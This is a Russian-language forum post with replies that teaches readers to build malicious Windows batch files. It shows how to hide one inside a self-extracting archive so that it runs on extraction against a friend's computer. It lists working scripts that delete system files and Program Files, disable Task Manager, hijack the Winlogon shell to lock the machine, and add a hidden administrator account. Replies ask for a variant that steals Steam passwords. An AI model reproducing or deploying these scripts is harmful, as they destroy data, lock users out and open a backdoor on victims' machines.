Батник, бат-вирус. [Обобщение]
-
**На днях подняли тему про бат для флешки. Тема была создана в сентябре... Многие не поняли и начали долбить личку телонко. Два человека написали в вк я им ответил там. **
Как создать сам батник:
[spoiler=Бат сделать! ]Для начало нам надо создать Текстовый документ.txtПравой кнопкой мыши по рабочему столу,дальше "создать" и выбираем "Текстовый документ"
Открываем его, дальше нам надо забить в него команды bat файлов
Вставим туда самую обычнуюАвторизуйтесь, для просмотра скрытого текста
Сохраняем и чтобы команда заработала нам надо перейменовать "Текстовый документ.txt" вместо txt пишем bat,у нас должно получится вот так "Текстовый документ.bat" (Без кавычек)Вот и все небольшой простенький вредоносный вирус создан.
Если хотите убедиться что вирус создан открываем Текстовый документ.bat
И радуемся))Если хотите вернуть местами кнопки мыши,тоЗаходим в Панель управления заходите в файл под названием "Мышь"
Убираем галочку где написано "обменять назначение кнопок",нажимаете применить.Вот и все.Если хотите пошутить над другом или подкинуть вирус то делаем так:
Ваш созданный вирус bat добавляем в архив, надеюсь все знают как это делается.Правой кнопкой мыши на файле и добавить в архив.
Мы зашли в "Имя и Параметры архива",ставим галочку где написано "Создать SFX-архив"
Потом заходим "Дополнительно" дальше в "Параметры SFX..."Где написано "Выполнить после распаковки"пишем НАЗВАНИЕ вашего bat файла, например если у вас название вашего bat файла "Текстовый документ.bat" то в поле "Выполнить после распаковки" пишем Текстовый документ.bat
И теперь если открыть вот этот наш архив (вирус),надо нажать "Извлечь",и вирус автоматический сработает.[/spoiler]
Думаю понятно....
Теперь самые известные скрипты, коды:
Убирает рабочий стол%(red)[@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul ]Выключается компьютер
%(red)[@echo off
shutdown -s -t 1 -c "lol" >nul ]Перезагрузка компьютера
%(red)[@echo off
shutdown -r -t 1 -c "lol" >nul ]Запрещает запускать программы
%(red)[@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul ]Удаление дров
%(red)[@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul ]Удаляет звуки Windows
%(red)[@echo off
del "%SystemRoot%\Media" /q >nul]Запрещает заходить в панель управления
%(red)[@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul]
Скриптов очень много различных! Чтоб понять все советую покапаться в сестемных папках компа, в свое время оч помогло. мля...И более серьезные:
[spoiler=Этот вирус,блокирует все программы,но интернет работает.]@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD [/spoiler]
[spoiler=Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач]@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO "Shell"="Explorer.exe, C:\windows\boot.bat " >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
nd[/spoiler]
[spoiler=Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)]@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y[/spoiler]
[spoiler=Убивает процесс explorer.exe]taskkill /f /im explorer.exe >nul[/spoiler]**Вроде все обобщил! В телонко никому не ответил оч много сообщений) Скриптов очень многО! **
P.s.Если это вас заинтересовало то более полную инфу можно узнать и познать на сайте БАТНИК.КОМ (Конечно в англ расскладке) -
Сам писал?
-
Расскажи про тот вирус для флешки который пароли ворует, куда пароли сохраняются
-
id98811595, Ща ту тему подправлю ок?
-
КЕП!
-
%(red)[Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD ] -
Сделал бы ты что бы пароль от стима крал) было бы ништяк)
-
хрень)
-
6o6ep :D:, он не чего сам не сможет! он скопипастил!
-
ReD Dim, ___
-
Мр Бронивичок, чего ты модер?
-
Копипаст ! с этого сайта!
-
непонял
-
Dzheims-BOND, не важно с какого сайта, главное что копировал!
-
Мр Бронивичок, что то я не чего не понял